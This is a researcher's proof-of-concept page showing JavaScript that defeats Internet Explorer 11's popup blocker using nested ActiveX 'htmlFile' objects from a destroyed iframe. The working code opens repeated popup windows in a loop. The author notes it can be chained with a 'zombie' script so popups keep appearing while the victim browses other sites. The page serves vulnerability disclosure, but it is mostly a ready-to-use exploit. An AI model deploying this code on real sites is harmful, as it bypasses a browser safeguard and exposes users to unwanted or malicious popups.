Popup Blocker bypass on Microsoft Internet Explorer
Destroyed htmlFile

PROOF OF CONCEPT Using a small variation of the technique described in the zombie alert, we can completely bypass the popUp blocker. In fact, this bypass can be combined with the zombie script, so we can throw popUps with no restrictions while the user is navigating on Google or any other site!
If you don't have Internet Explorer, watch this Video PoC.



<iframe></iframe>

// Create an htmlFile from an IFrame
var ax1 = new window[0].ActiveXObject("htmlFile");

// Destroy the contents of the IFrame, while keeping ax1 alive
// because we have a reference to it outside the IFrame itself.

window[0].document.open().close();

ax1.open().close(); // Initialize the htmlFile

// Create a new htmlFile inside the previous one
var ax2 = new ax1.Script.ActiveXObject("htmlFile");
ax2.open().close(); // Initialize the htmlFile

// Done! Its window.open method can't be seen by the popUp blocker
for (var i=0; i<5; i++)
{
    ax2.Script.open("https://www.twitter.com","WIN","width=250,height=250");
}


Tested on: IE11 [ Win7 | Win10 fully updated 2017/05/18 ]

Thanks to my friend Gareth, for helping me to make a clearer PoC.
Thanks to my friend Alex, for helping me to make it work in Win7.

Questions? Tweet me here: @magicmac2000